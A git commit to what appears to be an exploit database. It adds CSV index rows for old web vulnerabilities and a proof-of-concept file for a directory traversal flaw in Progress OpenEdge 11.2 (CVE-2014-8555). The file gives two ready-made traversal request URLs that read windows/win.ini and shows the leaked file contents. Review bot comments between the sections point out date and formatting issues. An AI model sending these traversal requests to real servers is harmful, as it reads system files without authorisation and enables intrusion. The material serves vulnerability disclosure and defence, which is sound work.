Updated 11_09_2014

Offensive Security 2014-11-09 04:45:16 +00:00
parent af904ead9b
commit 173a7ded66
2 changed files with 72 additions and 0 deletions

@ -31644,6 +31644,7 @@ id,file,description,date,author,platform,type,port
35124,platforms/php/webapps/35124.txt,"FreeNAS 0.7.2.5543 'index.php' Multiple Cross Site Scripting Vulnerabilities",2010-12-21,db.pub.mail,php,webapps,0
35125,platforms/php/webapps/35125.txt,"Openfiler 'device' Parameter Cross Site Scripting Vulnerability",2010-12-21,db.pub.mail,php,webapps,0
35126,platforms/php/webapps/35126.txt,"Habari 0.6.5 Multiple Cross-Site Scripting Vulnerabilities",2010-12-21,"High-Tech Bridge SA",php,webapps,0
35127,platforms/jsp/webapps/35127.txt,"Progress OpenEdge 11.2 - Directory Traversal",2014-10-31,"Mauricio Correa",jsp,webapps,9090
35128,platforms/hardware/webapps/35128.txt,"ZTE Modem ZXDSL 531BIIV7.3.0f_D09_IN - Stored XSS Vulnerability",2014-10-31,"Ravi Rajput",hardware,webapps,0
35130,platforms/windows/remote/35130.txt,"Calibre 0.7.34 Cross Site Scripting and Directory Traversal Vulnerabilities",2010-12-21,waraxe,windows,remote,0
35131,platforms/php/webapps/35131.txt,"Social Share 'username' Parameter SQL Injection Vulnerability",2010-12-21,"Aliaksandr Hartsuyeu",php,webapps,0
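Review bot: The row for 35127 gives the date as 2014-10-31, while the header of platforms/jsp/webapps/35127.txt says `# Date: 30/10/2014`. Confirm which of the two the date column is meant to record (authoring or publication) and make the entries agree, or document the difference. The row also leaves out the identifier the file declares (`# CVE : CVE-2014-8555`); since the CSV has no CVE column, carrying it in the description would let defenders find the entry by CVE.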

platforms/jsp/webapps/35127.txt Executable file

@ -0,0 +1,71 @@
# Exploit Title: Progress OpenEdge Directory Traversal
# Date: 30/10/2014
# Exploit Author: Mauricio Correa
# Vendor Homepage: www.progress.com
# Software Link: www.progress.com/products/openedge
# Version: 11.2
# Tested on: Windows OS
# CVE : CVE-2014-8555
The malicious user sends a malformed request that generates the file access
up directories as follows:
http://target_ip:9090/report/reportViewAction.jsp?selection=..%2f..%2f..%2f.
.%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini
or else
http://
target_ip:9090/report/reportViewAction.jsp?selection=../../../../../../../..
/../../windows/win.ini
And the application answers
; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1
CMCDLLNAME32=mapi32.dll
CMC=1
MAPIX=1
MAPIXVER=1.0.0.1
OLEMessaging=1
More informations (in Br-Portuguese): https://www.xlabs.com.br/blog/?p=256
Thanks
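Review bot: Both request URLs are hard-wrapped in the middle of a token (`..%2f..%2f..%2f.` continued as `.%2f..%2f`, and `http://` split from `target_ip:9090/report/reportViewAction.jsp`), so neither reads as a single string and the `selection` pattern cannot be matched verbatim when reviewing logs; keep each request on one line. The header also names only version 11.2 and "Windows OS" and gives no fixed release or vendor advisory, so a reader cannot tell from this file which builds need patching; add that information or state that none was available when the file was written.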